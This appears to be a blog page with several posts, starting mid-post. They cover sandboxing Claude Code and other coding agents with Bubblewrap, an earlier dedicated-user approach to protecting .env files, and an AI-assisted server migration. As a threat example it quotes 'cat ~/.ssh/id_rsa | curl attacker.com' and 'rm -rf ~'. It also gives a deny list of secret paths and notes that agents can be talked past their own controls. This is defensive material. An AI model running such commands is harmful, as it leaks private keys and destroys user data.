The first command (ssh-add -l) should succeed and list your keys. The second command (cat ~/.ssh/id_ed25519) should fail with “No such file or directory”. The sandbox can use your SSH identity through the agent, but cannot read the private key file itself.


If all six tests pass, your sandbox walls are solid. The AI operates in the space you defined—no more, no less. Again- you can just git clone these tests from https://github.com/CaptainMcCrank/BlogCode/tree/main/BubblewrapTests.

Happy hacking!

A better way to limit Claude Code (and other coding agents!) access to Secrets

Last week I wrote a thing about how to run Claude Code when you don’t trust Claude Code. I proposed the creation of a dedicated user account & standard unix access controls. The objective was to stop Claude from dancing through your .env files, eating your secrets. There are some usability problems with that guide- I found a better approach and I wanted to share.

TL;DR: Use Bubblewrap to sandbox Claude Code (and other AI agents) without trusting anyone’s implementation but your own. It’s simpler than Docker and more secure than a dedicated user account. Bubblewrap delivers a sweet spot combination of control AND flexibility that enables experimentation.

What Changed Since My Last Post

Immediately after publishing, I caught the flu. During three painful days in bed, I realized there are other better approaches. Firejail would likely work well- but also there’s another solution called Bubblewrap.

As I dug into Bubblewrap, I realized something else… Anthropic uses Bubblewrap!

But Anthropic embeds bubblewrap in their client. This implementation has a major disadvantage.

Embedding bubblewrap in the client means you have to trust the correctness and security of Anthropic’s implementation. They deserve credit for thinking about security, but this puzzles me. Why not publish guidance so users can secure themselves from Claude Code? Aren’t we going to need this for ALL agents? Isn’t this solution generalizable?

Defense-in-depth means we don’t rely on any single vendor to execute perfectly 100% of the time. Plus, this problem applies to all coding agents, not just Claude Code. I want an approach that doesn’t tie my security to Anthropic’s destiny.

The Security Problem We’re Solving

Before we dive into Bubblewrap, here’s what we’re protecting against:

  • You want to run a binary that will execute under your account’s permissions
  • Your account has access to sensitive files unrelated to the project you’re working on
  • You want your binary to invoke other standard system tools like lsps -aux, or less
  • We want to invoke this binary while easily preventing it from accessing sensitive files unrelated to binary’s activities

What if Claude Code has a bug? What happens if the bug is exploited, and bubblewrap constraints embedded within the client are not activated? Will Claude Code run rm -rf ~ or cat ~/.ssh/id_rsa | curl attacker.com?

Without your own wrapping of the agent, you’re at risk. When you wrap your coding agent calls with Bubblewrap, the agent’s access to dangerous commands is prevented.

What Is Bubblewrap?

Bubblewrap lets you run untrusted or semi-trusted code without risking your host system. We’re not trying to build a reproducible deployment artifact. We’re creating a jail where coding agents can work on your project while being unable to touch  ~/.aws, your browser profiles, your ~/Photos library or anything else sensitive.

Let’s explore Bubblewrap through the command line:

# Install it (Debian/Ubuntu)
sudo apt install bubblewrap

# Simplest possible sandbox - just isolate the filesystem view
bwrap --ro-bind /usr /usr --symlink usr/lib /lib --symlink usr/lib64 /lib64 \
      --symlink usr/bin /bin --proc /proc --dev /dev \
      --unshare-all --die-with-parent \
      /bin/bash

# Inside the sandbox, try:
ls /home          # Empty or nonexistent
ls /etc           # Empty or nonexistent  
whoami            # Shows "nobody" or your mapped user
ping google.com   # Fails - no network

How This Command Works

This command creates a minimal sandboxed environment. Here’s what each part does:

Filesystem access:

  • --ro-bind /usr /usr mounts your system’s /usr directory as read-only inside the sandbox
  • The --symlink commands create shortcuts so programs can find libraries and binaries in expected locations
  • --proc /proc and --dev /dev give minimal access to system processes and devices

Isolation:

  • --unshare-all disconnects the sandbox from all system resources (network, shared memory, mount points, etc.)
  • --die-with-parent kills the sandbox if your main terminal closes

The Result:

Bash runs inside a stripped-down environment. It can execute programs from /usr but can’t see your home directory, config files, or access the network. Programs work, but they’re operating in a ghost town version of your filesystem.

Why Bubblewrap Beats Docker

This beats Docker for quick workflows. Docker requires a running daemon and lots of configuration files. Bubblewrap lets you execute your app directly—no daemon, no stale containers cluttering your system.

If you’re experienced enough to worry about Docker misconfigurations, Bubblewrap gives you more control when you need it. You just run a command. No YAML files or debugging background services.

Quick Start: Running Claude Code with Bubblewrap

A big part of the reason for needing this, is –dangerously-skip-permissions. There are times when it’s very useful to give an agent autonomy in desiging, experimenting & implementing systems. Last week, I built a wifi access point that hosts a Quakeworld Server and vends web assembly quake clients. It’s an instant-lan party in a box. I did this unattended and it works. –dangerously-skip-permissions is very powerful- assuming you know how to aim it safely.

Here’s how I run Claude Code with --dangerously-skip-permissions inside a Bubblewrap sandbox:

PROJECT_DIR="$HOME/Development/YourProject"
bwrap \
     --ro-bind /usr /usr \
     --ro-bind /lib /lib \
     --ro-bind /lib64 /lib64 \
     --ro-bind /bin /bin \
     --ro-bind /etc/resolv.conf /etc/resolv.conf \
     --ro-bind /etc/hosts /etc/hosts \
     --ro-bind /etc/ssl /etc/ssl \
     --ro-bind /etc/passwd /etc/passwd \
     --ro-bind /etc/group /etc/group \
     --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
     --ro-bind "$HOME/.nvm" "$HOME/.nvm" \
     --bind "$PROJECT_DIR" "$PROJECT_DIR" \
     --bind "$HOME/.claude" "$HOME/.claude" \
     --tmpfs /tmp \
     --proc /proc \
     --dev /dev \
     --share-net \
     --unshare-pid \
     --die-with-parent \
     --chdir "$PROJECT_DIR" \
     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \
     "$(command -v claude)" --dangerously-skip-permissions "Please review Planning/ReportingEnhancementPlan.md"

Key Configuration Lines:

# Required for Claude Code to work
--ro-bind "$HOME/.nvm" "$HOME/.nvm" \

# Claude stores auth here. Without this, you'll re-login every time
--bind "$HOME/.claude" "$HOME/.claude" \

# Only add if you understand why you need SSH access
# --ro-bind "$HOME/.ssh" "$HOME/.ssh" \

# Block access to your .env files by overlaying with empty files (You need to know exact path of files 

     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \

Important: Most people don’t need the SSH line. It gives your agent the ability to SSH into systems where you’ve copied a public key. If you don’t understand the utility, don’t add it.

Why Not a Dedicated User Account?

My previous post proposed creating a custom user account for Claude on the host OS. This approach has three major problems:

1. ACL Tuning Becomes a Usability Nightmare

You’ll fight with file permissions constantly. You need to tune Access Control Lists to prevent access to sensitive .env files. This type of friction has killed security initiatives for decades. Security dies on usability hills.

I came up with that approach while getting sick with the flu. Please accept my apologies.

2. No Network Connectivity Restrictions

A custom account doesn’t solve the network access problem. Claude agents can spin up sockets and connect to whatever they want. Unless you run UFW and restrict outbound connectivity from your host, you risk your agent exfiltrating content.

I’ve been creating agents that remotely administer and tune servers. It’s not responsible to let agents have source:any destination:any access to your network or the Internet. One wrong prompt puts you at risk of data exfiltration. My previous solution was incomplete.

3. Docker Is the Wrong Tool

Docker solves the “it works on my machine” problem when moving code from your laptop to production servers. But most people aren’t deploying frequently enough to maintain strong Docker skills.

Setting up filesystems and networking in containers takes mental effort. If you just want to run a command safely, you shouldn’t need to install and configure a background service. People want something that works quickly without the cognitive overhead.

Why Use Your Own Bubblewrap Instead of Anthropic’s Sandbox?

Everyone makes security mistakes eventually. Claude Code is potentially dangerous. Which approach is safer?

Trust Anthropic: Hope their team never makes an implementation mistake that breaks security controls.

or

Don’t Trust Anthropic: Implement your own access controls in the operating system that constrain the binary at runtime.

There is one other big reason you should know how to leverage Bubblewrap. You need a solution for sandboxing agents that aren’t Claude Code.

Agents should never be considered trustworthy. Even when they have security controls. Put controls around them—don’t rely on agents built with models that have experienced misalignment.

A comparison of what you’re trusting with user-wrapped invocation of bubblewrap versus embedded bubblewrap in a client

Running Bubblewrap Yourself:

  • The Linux kernel’s namespace implementation
  • The Bubblewrap binary (small, auditable codebase)
  • Your own configuration (you wrote it, you understand it)
  • Your own proxy/filtering code

Using Anthropic’s Sandbox Runtime:

  • Everything above, plus:
  • Anthropic’s wrapper code and configuration choices
  • Anthropic’s filtering proxy implementation
  • Anthropic’s update/distribution mechanism (npm)
  • That Anthropic’s security interests align with yours

The Trust Matrix

Trust isn’t binary—it’s about understanding what you’re trusting and why. Here’s a quick comparison:

ThreatDIY bwrapAnthropic SRT
Claude accidentally rm -rf ~✓ Protected✓ Protected
Claude exfiltrating ~/.ssh✓ Protected✓ Protected
Supply chain attack via npm✓ Not exposed✗ Exposed
Subtle misconfiguration✗ Your risk✓ Their expertise
Agent Telemetry you don’t want sent✓ You control? Their choice
Novel bypass techniques✗ You’re on your own✓ Their team watches

So in Anthropic’s defense: this is not cut-and-dried. Most companies don’t have resources for great security teams. You have to decide whether you can own this. Many companies will be wise to rely on Anthropic’s expertise. Their reputation is on the line if someone breaks their sandbox implementation. But you’re going to be locked into Anthropic’s security model if you don’t learn how to wield bubblewrap. Pivoting to a new agent will require figuring out security there. Why not just rip the band aid off and learn bubblewrap?

Don’t trust me either!

This has been a fun writeup on trusting trust. TRUST ME!

But you shouldn’t trust me! I might be a Dog on the Internet. Maybe I’m ai slop?!

Here is some code you can use to test the bwrap container I provided for my claude usage. Note that this is invoked different- we’re not going to call claude- we’re going to call bash and pass it the test script. My test script is available here:

All you need to do is create a YourProject folder in your ~/$HOME/Development directory. Then create a sandbox-escape-test.sh in there. Fill it with the test code from my github.

Read and understand what the script does before executing it. This post is already pretty long 😀

Wrapping Up

I’m building with many agents—not just Claude Code. I need a generalized solution for sandboxing that I can apply to other agents.

Anthropic deserves attention and credit for the constraints they’re giving you. I wish they had published them in a way that doesn’t tie your security destiny to their ability to execute correctly 100% of the time.

The choice is yours: trust a vendor’s implementation, or take control of your own security boundaries. Both are valid. I might be paranoid. Are you feeling lucky?

p.s. If I ever get run over by a flaming pizza truck, here’s a handy 1 liner:

claude "Act as a security expert with a specialization in Linux system security.  Help me generate a bubblewrap script for safely invoking coding agents so they do not have access to sensitive data on my file system and appropriately manage other security risks, even though they're going to be invoked under my account's permissions.  Let's talk through everything that the agent should be able to do & access first, and then generate an appropriate bwrap script for delivering that capability.  Then let's discuss what access we should restrict."

Need help on topics related to this? I’m currently freelance! Let’s connect and build secure things at incredibly high speed:

https://www.linkedin.com/in/patrickmccanna

Keeping secrets from Claude Code

How to keep your .env files safe from AI coding assistants

UPDATE: This post blew up! But I discovered a FAR SUPERIOR approach. You still might like this! But bubblewrap is faster and more flexible.

https://patrickmccanna.net/a-better-way-to-limit-claude-code-and-other-coding-agents-access-to-secrets/


Someone posted online:

“I like how Claude Code casually reads my .env file.”

This is an accurate assessment of Claude Code. Claude Code reads .env files by default. It loads your API keys, database passwords and tokens into memory without asking.

Is this unappealing to you? Here’s how to manage that risk.

The Problem

Claude Code can read .env files automatically. If you run it without -dangerously-skip-permissions, normally it’ll ask permission for access. But what if claude stops acting normal?

Should the secrecy of your file rely on a system that prevents access to your file till you just type in the phrase ‘yes’?

How is it possible that claude code can’t access the file some times- and other times it can?

It’s possible because you’re logged in and running claude under your user account. Claude has all the permissions it needs to masquerade as you! Claude always had access to the file! It’s just being polite. The politeness of LLMs cannot be relied upon. When you run claude this way, any file accessible by you is accessible by claude.

Claude code is not supposed to break out of the Current Working Directory. But what technical constraints prevent it? If you run claude under your account, there’s no Linux/Mac OS control that prevents it from getting around to the photos/docs you have access to.

You’re trusting Claude to be polite and behave the way you expect.

If you invoke Claude (or any coding agent) under your user account, you’re trusting trust. Don’t despair! Here’s how to run Claude when you’re working on systems that demand safety.

The First Defense: A Separate User

Give Claude its own identity. Create the ‘Claude’ Group and User accounts.

On Linux:

# Create a group for Claude
sudo groupadd claude

# Create a user with no home directory privileges beyond basics
sudo useradd -m -g claude -s /bin/bash claude

# Set a password (you’ll need it for sudo later)
sudo passwd claude

On macOS:

# Create a group (find an unused GID first)
sudo dscl . -create /Groups/claude
sudo dscl . -create /Groups/claude PrimaryGroupID 400

# Create the user
sudo dscl . -create /Users/claude
sudo dscl . -create /Users/claude PrimaryGroupID 400
sudo ddcl . -create /Users/claude UserShell /bin/bash
sudo dscl . -create /Users/claude NFSHomeDirectory /Users/claude
sudo dscl . -create /Users/claude UniqueID 400

# Create home directory and set ownership
sudo mkdir -p /Users/claude
sudo chown claude:claude /Users/claude

# Set password
sudo passwd claude

The claude user now exists- run claude as it’s own user and keep the secrets files outside the permissions of the claude user.

Lock Down Your .env Files

Your secrets need permissions that exclude the claude user.

# Navigate to your project
cd /path/to/your/project

# Set ownership to yourself
chown $(whoami):$(whoami) .env

# Lock Down Your .env Files
# Remove all permissions for others
# Owner can read and write.
# Group and others get nothing

chmod 600 .env

The 600 permission means only you can read the file. The claude user belongs to a different group.

For extra certainty, explicitly deny the claude group:

# make sure .env is owned by your primary group

chown $(whoami):$(id -gn) .env chmod 640 .env

Verify your work:

ls -la .env

You should see something like -rw------- or -rw-r-----. The important part: no permissions on the right side for “others.”

Run Claude under the Claude user account

Become claude! Claude now runs with our claude user’s permissions. Your secrets remain invisible to the claude user because you’ve acl’d away access to the .env file

# Switch to claude user and run Claude Code

sudo -u claude claude

That’s it. sudo -u claude runs the command that follows as the claude user. Claude Code launches. If it tries to read your .env file, it’ll get a permissions denied error it can’t overcome.

For convenience, create an alias:

# Add to your .bashrc or .zshrc alias
claudecode=’sudo -u claude claude’

Now you type claudecode and everything’s safe

Summarizing:

# One-time setup (Linux)
sudo groupadd claude
sudo useradd -m -g claude -s /bin/bash claude
sudo passwd claude

# Per-project setup
cd /your/project
chown $(whoami):$(whoami) .env
chmod 600 .env

# Daily usage
sudo -u claude claude

  • Create a dedicated user for claude
  • Set file permissions that exclude the claude user from access to sensitive files
  • Invoke claude with sudo -u claude. let the OS enforce boundaries

The claude user can read your source code. It can write to project directories if you grant that access. But it cannot touch files owned by you with restrictive permissions. The operating system enforces this.

In the next section, I’ll summarize Anthropic’s stated controls. When you go this route, you’re trusting Anthropic to not only respect your wishes, but to write code so secure that it always and only does what they intend. All software has mistakes, even Anthropic’s. Buyer beware.

I include this next section out of respect for Anthropic- but my judgement is that using the following approach will eventually bite you in the butt.


The Second Defense: Deny Rules

Claude has mechanisms for restricting access. You’re trusting Anthropic to do the right thing correctly all the time. Anthropic has published mechanisms for telling Claude Code what it cannot touch. Do this before you write your first line of code. The configuration lives in ~/.claude/settings.json.

Create the file. Add these rules:

{ "permissions": 
    { "deny": [ 
        "Read(**/.env*)", 
        "Read(**/secrets/**)", 
        "Read(**/*credentials*)", 
        "Read(**/*secret*)", 
        "Read(~/.ssh/**)", 
        "Read(~/.aws/**)", 
        "Read(~/.kube/**)" ] 
    } }

The double asterisks catch nested directories. They catch the .env.local file you forgot you had.

Test your rules. Ask Claude Code to read your .env file. It should fail. If it reads the file anyway, something is wrong. Fix it before you continue.

The anthropic access controls are like putting a lock on your door. It keeps honest people honest. Locks can be picked. AI assistants can be influenced into circumventing their own controls.


An alternative approach: Containers

Containers are an approach for protecting secrets.

Run Claude Code inside a Docker container or a virtual machine. Give it access only to what it needs. The container is a sandbox the AI plays within. Your secrets stay outside the container. Make claude build the thing- it can have its own internal .env files- but for prod, you change your secrets.

Configure your container with read-only volumes for code. Mount nothing sensitive.

The AI agent can see project files in your container. It cannot see your home directory. It cannot see your SSH keys. It can’t probe through the Photos library in your home directory.

This approach follows the principle of least privilege. Grant minimum access required. Assume the worst.

My advice: Use operating system permissions, user accounts and groups

Leveraging Operating system access controls is defense in depth. Deny rules can be misconfigured. Vault integrations can fail. But Unix permissions have guarded secrets for a long time. You have to decide which risk is more probable: Kernel exploits that circumvent ACL’s or prompt engineering that pushes the Agent to access secrets. I’m going to put my resources into ACL’s and good OS hygenie. Then approaches don’t get distracted by clever prompts.

The Truth About AI Security

There is no going back. Claude is insanely useful. Coding agents write code faster than you can. They explain concepts clearly.

Coding agents are also prone to probabilistic outbursts. If you need to keep secrets, use deterministic/idempotent operating system access controls for preventing access.

Using custom AI Agents to Migrate Self-Hosted Services Between Servers

Migrations are hard.

I ran into an infrastructure challenge during my IoT development. A Raspberry Pi 5 (kbr server) ran three self-hosted services—Planka (Kanban boards), Ghost (blog), and Homer (dashboard). I needed to migrate them to a more powerful server running AMD Ryzen hardware. This would free my dev box up to experiment with new features in my Kanban/Blog/Reporting (KBR) tool.

The server I want to migrate to is already hosting critical AI services (Ollama, Open WebUI, and n8n). I do not want them disrupted during the migration.

Both systems used Cloudflare Tunnels for secure external access, Docker for containerization. They each had existing Ansible playbooks for deployment and backup. I wanted to:

  • Fully migrate production services from a Pi to the new server
  • Preserve all data (posts, drafts, images, kanban cards, attachments)
  • Keep existing AI services running untouched
  • Convert the old Pi into a development environment
  • Execute a clean DNS cutover with minimal downtime

The big problem is the limitations of my own brain. As I’ve been doing more AI supported development, the pace of my achievements is making it hard for me to maintain awareness of how everything is configured. I built this system months ago. My memory of how to backup and rebuild everything has faded. I had playbooks for building, but migrating existing data to a new deployment is a different beast.

Discovery Phase: Understanding Both Systems

I needed to deeply understand both systems to build a migration plan. I overcame my gaps in memory about how everything works by creating & using automated exploration agents to gather comprehensive information about each system’s architecture and deployed software.

For this project, the general design of my agents included:

  • an objective,
  • 7 phases of migration activities
  • Clear expressions around safety & best practices & defined success conditions.

My Agents have the following set of objectives:

You are a system analysis agent. Your task is to:
1. Review historical knowledge from previous agents
2. Analyze the project codebase to understand the intended system architecture
3. Connect to the running deployment and gather actual system state
4. Compare expected vs actual state
5. Produce a structured summary for troubleshooting purposes
6. Update knowledge repositories with discoveries
7. Create an Operations.md file in the Operations directory of the project if it doesn't exist.  

At a top level, the phases include:

Phase 0: Knowledge Base Review
Phase 1: Repository Structure Analysis
Phase 3: Live System Discovery
Phase 4: Analysis & Comparison
Phase 5: Context Documentation & Knowledge Updates
Phase 6: Operations Documentation
Phase 7: Final Deliverable

The general gist of the above is:

Search from a knowledge base of previous agent troubleshooting sessions that captured problems that were discovered & corrected. I do this because it reduces any need for redundant troubleshooting activities by the agents across different sessions. This also helps manage my token budget for the work.

Next, the agent looks into the code that generates the project to understand what’s supposed to be on the target system.

Then the agent looks into a live system to understand what’s actually on the systems (either due to configuration drift or some other change).

When that’s complete, we go munge everything we have into an operations document. This becomes my operations report.

Source System (kbr server) Discovery

The exploration agent showed:

  • 6 containerized services: Planka, Ghost, Homer, PostgreSQL, MySQL, and Nginx
  • 7 Docker volumes requiring backup (database data, attachments, content, avatars, etc.)
  • Cloudflare tunnel routing traffic for kanban.url, blog.url, and reports.url
  • Existing Ansible playbooks for backup and restore operations
  • Well-documented architecture in markdown files

Target System (ai server) Discovery

The agent found that the server I want to migrate to had:

  • Existing protected services: Ollama (LLM inference), Open WebUI (chat interface), n8n (workflow automation)
  • A Reserved ports list
  • A Storage constraint: /home partition at 75% capacity—I had to put new services in /opt/
  • Available resources: 650GB disk space in /opt/, 25GB+ RAM available
  • Active Cloudflare tunnel for my AI endpoint that I had to keep untouched

Validating Backup Procedures

I validated that the deployed backup scripts followed official documentation. I’ve found that the agents sometimes try to invent their own backup strategies. They can work, but they also break future updates. Next I fetched the official backup guides for both Ghost and Planka, then had the agent compare them against the existing backup_kbr.sh script.

The existing backup script matched all requirements and exceeded them with additional safeguards like SHA256 checksums and comprehensive manifests.

Planning Phase: Building a 10-Phase Migration Plan

I built a comprehensive migration plan through iterative review with the agent. I discussed, refined, and enhanced each phase based on operational concerns.

The 10 Phases

PhasePurpose
1. Pre-Migration PreparationVerify prerequisites, create rollback points
2. Data Quality AssessmentGenerate backup, verify integrity, record baseline counts
3. Prepare ai serverCreate directory structure, Docker Compose stack
4. Data Transferrsync backup to target, restore databases and volumes
5. Testing (QA/QC)Local testing, data verification, create Ghost API key
6. Staging DNSAdd temporary *bak DNS names to ai server tunnel
7. Staging ValidationExternal testing, write tests, Go/No-Go checkpoint
8. Reconfigure kbr serverConvert to dev environment with *-dev DNS names
9. DNS CutoverSwitch production names to ai server
10. CleanupRemove staging DNS, update Homer links, set up monitoring

Key Planning Decisions

DNS Strategy: I implemented a staged approach:

  • Current: Production names on kbr server
  • Staging: Temporary *bak names on ai server for testing
  • Final: Production names transferred to ai server
  • Dev: New *-dev names on kbr server for experimentation

Port Allocation: The agent selected ports that don’t conflict with existing services.

Storage Location: The agent put all migration files in /opt/kbr-migration/ to avoid the space-constrained /home partition.

Enhancements I Added During Review

Through iterative discussion, I enhanced the plan with:

  • Health check loops instead of arbitrary sleep commands for database readiness
  • rsync with progress instead of scp for large file transfers
  • Baseline counts table to verify I lost nothing (posts, drafts, images, cards, attachments)
  • Write tests to verify full functionality (create test post, create test card)
  • Go/No-Go checkpoints before major transitions
  • Rollback procedures with automatic restoration on failure
  • Ghost Content API key creation for the reporting dashboard
  • Homer URL updates since the migrated config still pointed to old URLs

Executing the Plan

Prerequisites

Before I started execution:

  • Obtain a Cloudflare API token with DNS edit permissions for the domain
  • Verify SSH access to both servers
  • Confirm Docker runs on both systems
  • Check available disk space in /opt/ on ai server

Execution Flow

Phases 1-2: Safe, Read-Only Operations

These phases don’t modify any running services. They create backups, verify data integrity, and establish baseline measurements. If anything looks wrong, I stop here—no harm done.

# Run the backup
cd /home/Development/Playbooks/SelfHosted_K_B_R
ansible-playbook -i inventory backup.yml

# Record baseline counts for later comparison
ssh account@kbr.server
docker exec ghost-db mysql -u ghost -p... ghost \
  -e "SELECT status, COUNT(*) FROM posts GROUP BY status;"

Phases 3-5: Target System Setup

I create the Docker infrastructure on ai server and restore the backup. I test locally before any DNS changes.

# Create directory structure
sudo mkdir -p /opt/kbr-migration
sudo chown account:account /opt/kbr-migration

# Transfer and extract backup
rsync -avh --progress backups/*.tar.gz account@ai.server:/opt/kbr-migration/

# Start databases with health checks
docker-compose up -d planka-db ghost-db
until docker exec kbr-planka-db pg_isready -U planka; do sleep 2; done

# Restore data
zcat databases/planka_db.sql.gz | docker exec -i kbr-planka-db psql -U planka -d planka

Phases 6-7: Staging Validation

I add temporary DNS names and test externally. This is the last safe checkpoint—production still runs on kbr server.

The Go/No-Go checkpoint requires all tests to pass:

  • All staging URLs accessible
  • Images and drafts verified
  • Test post/card creation works
  • Existing ai domain endpoint still functional
  • Baseline counts match

Phases 8-9: The Cutover

This is where production switches. A brief window of unavailability exists between reconfiguring kbr system and completing the DNS cutover on the ai server.

# On kbr server: Switch to dev names
# On ai server: Add production names to tunnel
cloudflared tunnel route dns <tunnel-id> kanban.myurl.io
cloudflared tunnel route dns <tunnel-id> blog.myurl.io
cloudflared tunnel route dns <tunnel-id> reports.myurl.io

Phase 10: Cleanup

I remove temporary staging DNS entries, update Homer dashboard links to point to production URLs, and set up automated backups and health monitoring.

Rollback Capabilities

The plan includes rollback procedures at multiple points:

  • Before Phase 8: Simply remove staging DNS from ai server; kbr server remains production
  • After Phase 9: Re-route production DNS back to kbr server, restore its original tunnel config

I backed up all cloudflared configs before modification, enabling quick restoration if needed.

Lessons Learned

What Made This Migration Plannable

  • Existing documentation: Both systems had Operations directories with current state information
  • Ansible playbooks: Existing backup/restore automation provided a foundation
  • Docker containerization: Clean separation of services made migration straightforward
  • Cloudflare Tunnels: DNS changes don’t require firewall modifications

Prompt Engineering Insights

The planning session revealed that infrastructure migration requests benefit from explicit upfront information:

  • Migration type (full migration vs. backup copy)
  • Post-migration role for source system
  • DNS naming constraints (Cloudflare doesn’t allow underscores)
  • Storage preferences on target system
  • Links to official backup documentation
  • Specific data verification requirements
  • Service dependencies (API keys, credentials)
  • Rollback expectations

A structured prompt template capturing these elements can reduce planning clarification cycles significantly.

Conclusion

Migrating self-hosted services between servers doesn’t have to be scary. I used agents to perform discovery through a phased approach that included staged DNS testing, and clear rollback procedures to execute this complex migration.

The key principles:

  • Discover before planning: Understand the source and migration destination systems deeply
  • Validate backup procedures: Ensure they match official documentation
  • Stage before cutting over: Test with temporary DNS names first
  • Build in checkpoints: Go/No-Go decisions prevent premature transitions
  • Plan for rollback: Every change should be reversible
  • Verify with baseline counts: compare before and after